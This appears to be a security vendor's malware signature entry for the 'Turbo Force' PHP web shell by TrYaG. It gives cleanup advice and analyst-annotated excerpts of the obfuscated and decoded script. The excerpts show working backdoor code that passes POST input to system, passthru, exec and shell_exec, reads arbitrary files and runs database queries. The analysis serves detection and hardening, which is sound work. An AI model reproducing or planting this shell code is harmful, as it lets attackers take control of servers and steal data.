Malware Signatures


php.hacktool.tryag_cpanelcracker.002

Turbo Force By TrYaG is a sophisticated tool that provides an interface to several types of databases: MySQL, MS SQL, PostgreSQL and Oracle. It also allows hackers to execute arbitrary commands on hacked servers.

Affecting

Any server with PHP enabled

Cleanup

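Delete the malicious script and scan your server for other types of malware, specifically for backdoors. The script lets an attacker run arbitrary commands and read files, so deleting it alone does not undo anything that was changed or installed through it.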
You can also sign up with us and let our team remove the malware for you.

Dump

... excerpt from the encrypted script ...

<?php /* Turbo Force By TrYaG.CC - TrYaG AcaDemY */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10} ...

... excerpts from the decoded script ....

function dump($table)
{
if (empty($table)) return 0;
$this->dump = array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: ' . date("d/m/Y H:i:s");
$this->dump[3] = '## Database: ' . $this->base;
$this->dump[4] = '## Table: ' . $table;
$this->dump[5] = '## --------------------------------------- ';
switch ($this->db) {

...

// [analyst note] Method of the shell's database helper; the enclosing class header is not part
// of this excerpt (presumably the my_sql class instantiated in the db_query handler -- confirm
// against the full decoded sample).
// It closes $this->connection with the close function that matches the backend named in
// $this->db. A value of $this->db that matches none of the four cases does nothing.
// Every call is prefixed with @, which suppresses warnings from the close call.
// mysql_close() and mssql_close() belong to extensions that were removed in PHP 7.0, which
// suggests the sample was written for legacy PHP installations.
function close()
{
switch ($this->db) {
case 'MySQL':
@mysql_close($this->connection);
break;

case 'MSSQL':
@mssql_close($this->connection);
break;

case 'PostgreSQL':
@pg_close($this->connection);
break;

case 'Oracle':
@oci_close($this->connection);
break;
}
}

...

if (!empty($_POST['cccc']) && $_POST['cccc'] == "download_file" && !empty($_POST['d_name'])) {
if (!$file = @fopen($_POST['d_name'], "r")) {
err(1, $_POST['d_name']);
$_POST['cccc'] = "";
}

...

if (!empty($_POST['cccc']) && $_POST['cccc'] == "db_query") {
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';', $_POST['db_query']);

...

// [analyst note] Command-execution part of the web shell. The POST field 'att' selects which PHP
// process-execution function is called (system, passthru, exec or shell_exec), and the POST field
// 'ccmmdd2' is handed to that function unmodified as the command line. Nothing in this excerpt
// authenticates the request or filters the value. The command output is written unescaped
// between <textarea> tags in the response.
// For detection: in this variant the request field names 'att' and 'ccmmdd2', and these four
// functions being called directly on $_POST data, are usable indicators for request-log review
// and file-content scanning. Field names are trivially changed, so treat them as one signal.
// For hardening: these four functions can be listed in the php.ini disable_functions directive
// where the hosted applications do not need them.
// $_POST[att] uses a bare word as the array key. Legacy PHP treats an undefined constant as the
// string 'att'; PHP 8 raises an Error instead, another sign the sample targets old PHP versions.
if ($_POST[att] == 'system') {
echo '
<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
system($_POST['ccmmdd2']);
echo '</textarea>';
}

if ($_POST[att] == 'passthru') {
echo '
<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
passthru($_POST['ccmmdd2']);
echo '</textarea>';
}

// [analyst note] exec() returns the output as an array of lines in $res. As printed here the
// lines are joined with the letter "n"; presumably "\n" was intended and the backslash was lost
// in the original or in this listing -- confirm against the sample.
if ($_POST[att] == 'exec') {
echo '<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
exec($_POST['ccmmdd2'], $res);
echo $res = join("n", $res);
echo '</textarea>';
}

if ($_POST[att] == 'shell_exec') {
echo '<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
echo shell_exec($_POST['ccmmdd2']);
echo '</textarea>';
}

...

// [analyst note] Result banner, then the script stops. $ok is interpolated into the message;
// presumably it is the number of cPanel logins the tool reports as found -- the code that sets
// it is not part of this excerpt.
// The fixed text "Cpanel By Tryag Script Name" is a static string that can serve as a
// file-content signature for this family.
// $_SERVER['PHP_SELF'] is echoed into the href without quoting or escaping.
echo "<hr><b>You Found <font color=green>$ok</font> Cpanel By Tryag Script Name</b>";
echo "<center><b><a href=" . $_SERVER['PHP_SELF'] . ">BACK</a>";
exit;

...

if ('' == ($func = @ini_get('disable_functions'))) {
echo "<font color=#00800F>No Security for Function</font></b>";
}
else {
echo "<font color=red>$func</font></b>";

...